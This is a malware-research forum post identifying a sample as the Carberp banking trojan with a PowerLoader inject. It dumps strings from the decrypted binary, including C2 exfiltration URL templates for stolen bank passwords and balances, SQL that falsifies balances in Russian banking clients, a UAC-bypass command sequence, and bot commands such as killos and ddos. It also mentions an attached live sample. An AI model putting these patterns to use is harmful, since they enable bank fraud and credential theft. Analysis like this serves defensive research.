attached
Attachments
infected
(270.63 KiB) Downloaded 119 times
(270.63 KiB) Downloaded 119 times
Win32:Virut wrote:a) AhnLab detected as Trojan/Win32.Zbot but I don't think it is Zbot.Carberp with PowerLoader inject. In attach decrypted. However most of routines called in runtime by pointers not by IAT.
Strings
Code: Select all
.text user32.dll md5 av uid save_tf READY
%s:%s
HELLO
GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&comment=%s HTTP/1.0
:
І" it is16 it update PAYDOCRU set DOCUMENTDATE=?, STATUS=30001 where PAYERACCOUNT=? and DOCUMENTDATE=? and DOCUMENTNUMBER like '%%%s%%' select min(DOCUMENTDATE) from PAYDOCRU ot http://%s/set/bal.html?uid=%s&type=bss&sum=%s&acc=%s&pass=%s&cid=%s PWD= select Rest,Account from Account os31 os31 CBankClient cbank_copy.txt is16 update ACCOUNT set REST=%s where ACCOUNT=? select CLOSINGBALANCE from STATEMENTRU where STATEMENTDATE=(select Max(STATEMENTDATE) from STATEMENTRU) and CLOSINGBALANCE<>0 os16 is16 it update STATEMENTRU set OPENINGBALANCE=%d.%d, CLOSINGBALANCE = %d.%d where ACCOUNT=? and STATEMENTDATE=? select OPENINGBALANCE,CLOSINGBALANCE,STATEMENTDATE from STATEMENTRU where ACCOUNT=? and STATEMENTDATE>=? and OPENINGBALANCE<>0 order by STATEMENTDATE os16 os16 ot is16 it CBank system CryptLib.DLL 0 гX Ф8 З@ В@ ‡5 ]~ Ъ| c:\err_bl.exe cfg file_name mJ ^@ r? b@ д? Є? 9M т@ = MO lO иW ЈK ёK ЂK *K UK тQ 9 ‰Ю гX µ З@ В@ Y BJB application/octet-stream application/xhtml+xml application/xml application/javascript application/x-javascript ; text/ г] lO л] V` )^ № : | ze lO i f lO "f %debug% false %bot_id% 2v .exe application/x-www-form-urlencoded & АP МU ЁU HJGsdlk873d hstbmld.sgl bnk.list nobnk.list Content-Transfer-Encoding: binary Content-Type: -- https http Keep-Alive close ru */* ; filename=" Content-Disposition: form-data; name=" multipart/form-data; boundary= chunked
Content-MD5 Cache-Control Content-Range Accept-Ranges Location Connection Transfer-Encoding Range Pragma Content-Length Content-Type Accept-Encoding User-Agent Accept Referer Host HTTP/1.1 HTTP/1.0 TRACE PATCH OPTIONS CONNECT UNLINK LINK DELETE PUT HEAD POST GET X X шW фW мW дW ЬW ФW МW ДW јW °W ¤W њW ”W ЊW ЂW pW `W PW HW @W ,W W W W фV дV ШV \U АP РV `U ИV МU ЁU ЁV ЂV pV lV hV `V TV :// ? / LV DV @V 0V АT V %02X :// " bytes
0
HTTP/1. --------- bytes= - / Ё k№ HTTP/ ]є |є №® т@ z> z> #Ї ›є т@ т@ ¶№ ‚Е ‹Д gД Е 8Е \ PI BSS A: Floppy <P> </P> <L> </L> *bsi.dll* !Y !P bss Пароль ===> <Screen%d> screen%d.png ---> <TextLog%d> [%s] TextLog%d.txt UID: bss.log sign\ ЗЩ Новый текст кнопки: [%s]
Координаты %d, %d Кликаем по кнопке [%d][%s] Обрабатываем окно установки подписей. Подписей %d MЬ vЬ /Ь -Э Кликаем по кнопке закрытия Окно ввода пароля ‰Ю ЬУ пУ пС Окно ошибки ‰Ю ЁЮ пУ пС Обрабатываем форму [%s] Отображается окно: Получена команда СТОП *az_stop Получена команда СТАРТ *az_start CABINET .. . \*.* My e q r v n i 3 7 d s ieunitdrf.inf cert Pass.txt cert.pfx javassist.jar .log .db .pif .rar .tpl .rtf .doc .pl .cgi .7z .inc .phtm .php3 .phtml K8DFaGYUs83KF05T /pat/scrl.html X\ P\ H\ @\ <\ 4\ 0\ (\ \ \ \ \ \ ь[ http:// / *.* * sessionstore.* cookies.sqlite Mozilla\Firefox\Profiles\ C:\WINDOWS\system32\Macromed\ *.sol Macromedia\Flash Player\ cookie: \Cookies\index.dat %userprofile% 2 Seven 2008 Vista ‹
Microsoft Enhanced Cryptographic Provider v1.0 msctls_statusbar32 bin\paymentmodule\ cyberterm.exe cyberterm.mdb cbrplstf01.dat cptmp CyberPlat Keys Proc1 cyberplat.plug } { Software\Classes\CLSID\ PL ? os ”% FileGrabber keys *-BEGIN*-END* finam.ru finam no-store, no-cache, must-revalidate If-None-Match If-Modified-Since Last-Modified °W ¤W њW ЂW pW `W PW _ _ р^ дV РV М^ LV DV NSS layer ftp://%s:%s@%s:%d kernel32.dll advapi32.dll user32.dll ws2_32.dll ntdll.dll winsta.dll shell32.dll wininet.dll urlmon.dll nspr4.dll ssl3.dll winmm.dll cabinet.dll opera.dll Gdi32.dll gdiplus.dll crypt32.dll Iphlpapi.dll winspool.drv odbc32.dll comdlg32.dll psapi.dll shlwapi.dll version.dll Imagehlp.dll ole32.dll cryptdll.dll .dll https://s4.money.yandex.net* и` passw.plug .ngdf NGWF %X эO V {S E[ O] З@ В@ b:\ drive_b a:\ drive_a file txt save_sf screens HnT h n t . d a t pid_%d patchsetuped 1 procscreen SS_2.png windscreen SS_1.png keyfile host PSB hwnd pid keyhwnd file[Screen2] Screen2.png file[Screen1] Screen1.png file[Key] txt[log] WorkAcnt Accounts Status1103 Status1101 Times FreezeBal PlatSumm Drops FillDataToDBCache HProc7 GlobalAppStorage HProc6 RtlStore.bpl TCustomFormCloseQuery HProc5 TCustomFormShow HProc4 vcl70.bpl TaskAfterSynchRun HProc3 RtlData1.bpl OpenDatabaseConnection HProc2 VistaDB_D7.bpl , IFobs OldVersion DATA Client_prg\ ifobs.ini ifobs_scr scr http://%s/raf/?uid=%s&sys=ifobs&cid=%s&mode=setlog&log=1&text=%s keyssign\%s KeysSign Sign Path Sign Password Sign login keys\%s , Client folder: Path keys Password key Password system Login keys_dll\%s http://%s/raf/?uid=%s&sys=ifobs&cid=%s&mode=setlog&log=00&text=%s http://%s/raf/?uid=%s&sys=ifobs&cid=%s&mode=balance&sum=%s&acc=%s&text=bank|%s&w=1&ida=%s Счет: '%s', баланс: '%s', банк: '%s' DLL -> Login: '%s', Password system: '%s', Password keys: '%s', Path keys: %s, Client folder: %s rtlext.plug ifobs.plug RtlExt.bpl PasswordsCallBack BalanceCallBack InitFunc *TSignAsForm* *..* *TLoginForm* *iFOBS* lфШЅмЩШЅифщН ‚Jдсы~> 0‚ \ ntdll.dll KiUserApcDispatcher atan WriteProcessMemory _chkstk kernel32.dll \ B a s e N a m e d O b j e c t s \ U r l Z o n e s S M _ S Y S T E M \ B a s e N a m e d O b j e c t s \ U r l Z o n e s S M _ A d m i n i s t r a t o r \ B a s e N a m e d O b j e c t s \ M S C T F . S h a r e d . S F M . A M F \ B a s e N a m e d O b j e c t s \ M S C T F . S h a r e d . S F M . M I H \ B a s e N a m e d O b j e c t s \ w i n d o w s _ s h e l l _ g l o b a l _ c o u n t e r s \ B a s e N a m e d O b j e c t s \ S h i m S h a r e d M e m o r y inject32_event inject32_section SetWindowLongA OutputDebugStringA CreateThread OpenFileMappingA MapViewOfFile CloseHandle Shell_TrayWnd v– i n d e x . h t m l PW дV М^ :// LV DV Accept-Encoding:
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ 1406 1609 Software\Microsoft\Internet Explorer\ Styles MaxScriptStatements Privacy CleanCookies Pat.txt wj.dat %s\%s\MSI Java7FamilyVersion Java6FamilyVersion JavaHome SOFTWARE\JavaSoft\Java Runtime Environment CurrentVersion SOFTWARE\JavaSoft\Java Update\Policy EnableJavaUpdate JAVAUPDATE AUTOUPDATECHECK IBank %sb.php?uid=%s&c=%s&v=%d&jv=%d_%d&botver=%s first_start setup_patch uid.txt CRC32.txt rt.jar wndrec.dll user.txt rt.ini rt2.jar rt_.jar lib launcher.jar "%s\AgentX.jar";launcher.jar;sinker-swing.jar;sinker.jar;firmware.jar;"%s\lib\javassist.jar" -Xmx256m -Xmx256M -javaagent:"%s\AgentX.jar" -Dsun.awt.warmup=true -javaagent:"%s\AgentX.jar" -Xbootclasspath/a: "%s\lib\javassist.jar";"%s\AgentX.jar"; javaw.exe java.exe PatchFail.txt url.txt AgentX.jar rt \lib\rt.jar rt_jar/ SunAwtCanvas ф4№е]} Tm №µ›Ђ¶™Ъэ Џъ
%®юw:Г<Ѕ :// ШД jclib25.ini bcspsb.inf client2015.tmp client2015.jar ibank2client.jar _client2015_orig.jar *://ibank2.ru/* */client_ver.js *://online.payment.ru/juricvalrur/JuridicalClient.html kp_videoprocess kp_svc_mt ]Й гИ ™К pК <Й pК Подпись и шифрование Подпись данных *егистрация пользователя* bss bsi.dll https://*/ibc Password: EDIT #* faktura avangard logon_enter c:\avn_ib avn_ib file.key *oper*BEGIN*END* *Клавиатура* cyberplatweb \BSS.V1\ \\.\PHYSICALDRIVE0 ImagePath \services\ACPI SYSTEM\ system32\drivers\AСPI.sys CurrentControlSet ControlSet002 ControlSet001 .xsi .ksi *.xsi *.ksi base id plist DSStor
Connection: Close
Host: User-Agent: Accept-Encoding: gzip, deflate
UA-CPU: x86
Accept-Language: ru
HTTP/1.1
Accept: */*
GET / Data CN ?|POST: cc data type brw cab type_name sdcabfile.cab bktrue 0123456789abcdefinstallam bitcoin_runned.txt btc.plug btcm.plug bitcoin_stop bitcoin VControl Информация об отправляемых документах sended save comment queue daterecv punktrecv accbankrecv bankrecv bikrecv namerecv accountrecv kpprecv innrecv nds sum namesend kppsend innsend status typepayment date express num Canvas Платёжное поручение form На данный момент это функцию выполнить невозможно, так как на сервере проводятся профилактические работы. Попробуйте через некоторое время.
Извините за доставленные неудобства. .xml .txt report.html <AccountStatements> F00: HEADER 1CClientBankExchange <td Сумма в валюте счета Количество операций Исходящий остаток на конец дня Входящий остаток на начало дня <tr> </tr> КонечныйОстаток ВсегоСписано СекцияДокумент КонецДокумента F44: OPERATION F312: F42: F29: F70: F71: F46: F52: F69: <DebitOverturnCount> <Statement> </Statement> <DebitOverturn <DebitOverturnCover> <DebitOverturnDealing> <DebitOverturnDealingCover> <OpenRemainder> <OutRemainder> <OutRemainderWithDealing> Шаблоны msctls_progress32 Подождите, идет настройка системы ... STATIC skeys miner ammyy aa.exe http://%s/raf/?uid=%s&sys=raifur&mode=setlog&log=%d%s%s &text= Внимание! report_html export_to_client_bank export_to_1C export_to_xml Счет N: (РОССИЙСКИЙ РУБЛЬ) РОССИЙСКИЙ РУБЛЬ http://%s/raf/?uid=%s&sys=raifur&cid=%s&mode=%s&%s sum=%s&acc=%s %s:%s; accs= getdrop getdrops M*
c
<Й Њц Key am.cfg %s
iphlpapi1.dll iphlpapi.dll aa1.exe ammy.plug -> rafa.dat WriteFile CreateFileA TrackPopupMenu CreateWindowExA SendMessageA FilialRCon.dll KERNEL32.DLL USER32.DLL raif StopMiner InitMiner cgminer.exe stop del њW ЂW `W http:// pgcache :// LV GDlet64E wndsksi.inf BJB botuid SG
.tmp http://%s/set/bit.html?uid=%s&sum=%d&type=cber&mode=stat&cid=%s http://%s/s.dll sber sbef.dat sbe.dat sbe 7.17 \StringFileInfo\%04x%04x\FileVersion \VarFileInfo\Translation SOFTWARE\SBRF\WCLNT Install_0 sb.bal Local Settings\Application Data\Sbr\sbgrbd.bal %USERPROFILE% Sber RegQueryValueExACallBack RegQueryValueExA LoadLibraryExWCallBack LoadLibraryExW GetOpenFileNameACallBack GetOpenFileNameA GetSaveFileNameACallBack GetSaveFileNameA EnumPrintersACallBack EnumPrintersA ExtTextOutWCallBack ExtTextOutW ExtTextOutACallBack ExtTextOutA TextOutWCallBack TextOutW TextOutACallBack TextOutA DrawTextExWCallBack DrawTextExW DrawTextExACallBack DrawTextExA DrawTextWCallBack DrawTextW DrawTextACallBack DrawTextA TranslateMessageCallBack TranslateMessage ShowWindowCallBack ShowWindow SetParams wclnt.exe ф|UУљs шу.L|
updateplug reboot killos bc ddos grabber deletecookies sendcookies \| iblock processblock getsbr UpdatePatch deletepatch T| L| PluginMain search Global\_SearchComplete32 gAltEPOffs docfind.plug RDP N O D 3 2 i g n o r e f i l e notreboot addtrust.plug update updateconfig download loaddll alert updatehosts loaddlldisk docfind rs rdp vnc ifobs lf exec addtrust download2 cbank installbtc u p d a t e c o n f i g l a s t s y n c s e l e c t a m o u n t s a m o u n t f l a g o r d e r c o d e s e l e c t a m o u n t s a m o u n t f l a g t r a n s f l a g d e s c select CLng(?) as MyDate it oi DRIVER=Microsoft Access Driver (*.mdb);DBQ= tiny_client\ select Name from Banks where Code=? os81 is30 select Param from Config where Code='MyBankId' os30 keys_tiny select Param from Config where Code='keypath' os255 Data Source= select Code From Amounts os32 update MyDocuments set OrgDate=?, DayDate=?, PayDate=? where DebitInit=? and Created>=? and Created<=? and Code=? ii ii ii is24 it it is31 update Documents set OrgDate=?, DayDate=? where DebitInit=? and Created>=? and Created<=? and Code=? ii ii is24 it it is31 update Turns set ConDebit=%d.%02d where Code='%s' and DayDate=%d update Amounts set Expected=%d.%02d,Confirmed=%d.%d where Code='%s' http://%s/raf/?uid=%s&sys=tiny&cid=%s&mode=balance&sum=%s&acc=%s&text=bank|%s&w=1 %d.%d select Code,Confirmed from Amounts where Confirmed>0 http://%s/raf/?uid=%s&sys=tiny&cid=%s&mode=setlog&log=00&text=%s Password= tiny Path client Path database Password select ConDebit from Turns where Code=? and DayDate=? select Expected from Amounts where Code=? os31 is31 select OrgDate,DayDate,PayDate from MyDocuments where DebitInit=? and Created>=? and Created<=? and Code=? oi oi oi is24 it it is31 select OrgDate, DayDate from Documents where DebitInit=? and Created>=? and Created<=? and Code=? oi oi is24 it it is31 select min(OrgDate) from Documents oi Tiny TKeyPasswordDlg TPasswordDlg TfAuthNew task_bypassuac.txt CRYPTSP.msu cryptbase.msu CRYPTSP.dll cryptbase.dll mcx2prov.exe sysprep.exe ehome system32\sysprep WinExec LoadLibraryA .rsrc cmd.exe /C %s cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\%s makecab.exe /V1 %s %s {Tab} {Down} {Up} {Right} {Left} {Del} {Back} URL.txt <Click> 0x%08X ScreenShots\ .png h† њ† Ё† „† ”† HЉ h† њ† Ё† p† „† ”† HЉ h† p† „† ”† HЉ Edit Address Band Root ReBarWindow32 WorkerW ComboBox ComboBoxEx32 https:// LogData.txt < .png> . % ' & ( aЉ2fУв¬УkКЗsК·sЇ0т`ЋВ·83Ѓ-kmкзГcЋ<Ж°·>фЃу>€г2"ЈТќг4$KЯ6HЮ xГXЁ«6SЛг•уУебF»‰'zЎкмтhojЩ>MMm¤sЉўТыШ,ЛfzыШ5§іҐЄZ"ЗШ5Ќ+9ЦюЁ2ВяјPЗШeН-9VтЁ2CуЁGFк4VдіF]ГC§•CЗo—Ш…јЈЯі%п2ТS·0жRуШвП53і8Щ`ђ$[@аю0eЉ§YЁЇ0юёл6®Xу>»‚Љ\!Є6S<FОёР у$Йл>ВЄL–b–ё8 Xxа¶тkY вЇ>БXіFъя>aрљ0чЭ«^gл$^·0eкЇЬВГ6 8ђ;«0ЦBЯГліF©«
Cті8У:2еЎж»‰«2’Я 3џќ™Л'Й·v kі®®/жНСVНщVиз6юЙ>Cкt cр¤ъS{іЂА0‘ґ4P’=гЕ@$°3ЕЈ1DЅ~{в±Фx0е¤ ,ді>Е©Ї Э«Л0\
Ч”ЉЛ8Ы"ЇTЪП>{kЛ\C30€Kw0lЃг64 s вV¤ьµэ€џ(…Џї&‹+н_ОBdjС"лЈ 2&ЙIq7
‰;ъ‰Uт± гВЃ
奩АJЗШEЖлъ±&уШEЫ8uйЄB
Я«Сз¤п™дђ0*тІ–уXО %s %s %s %08X%08X RegId InstallDate DigitalProductId SOFTWARE\Microsoft\Windows NT\CurrentVersion , In progress... KERNEL32 ExitProcess %ALLUSERSPROFILE% Chrome_WidgetWin_0 OperaWindowClass MozillaWindowClass IEFrame Global\ NUL Have Wins: No
Secondary Wins Server: %s
Primary Wins Server: %s
Have Wins: Yes
DHCP Enabled: No
Lease Obtained: %ld
DHCP Server: %s
DHCP Enabled: Yes
***
MAC Address: %2X-%2X-%2X-%2X-%2X-%2X Gateway: %s
IP Mask: %s
IP Address: %s
Adapter Addr: %ld
Adapter Desc: %s
Adapter Name: %s
… \/:'" VNCDLL vncdll.plug DllStop TakeBotGuid Stop Start Init rdp.plug wbem VNC vnc.plug [CLASS: ] [TEXT: ] strstr _allmul _alldvrm ntdll.dll У DeleteFileA “GetTickCount KERNEL32.dll <P 8P 4P %az.host% THH 13+430+715+<4 <P 8P 4P = <P 8P 4P F <P 8P 4P @V \ p i n g . e x e \ i g x p d v 3 2 . d a t \ i g x p g d 3 2 . d a t “РU“UBSSSign loaddlls _BT_VER:1.3.0 PLUG_NAME <4+4<1+701+23 
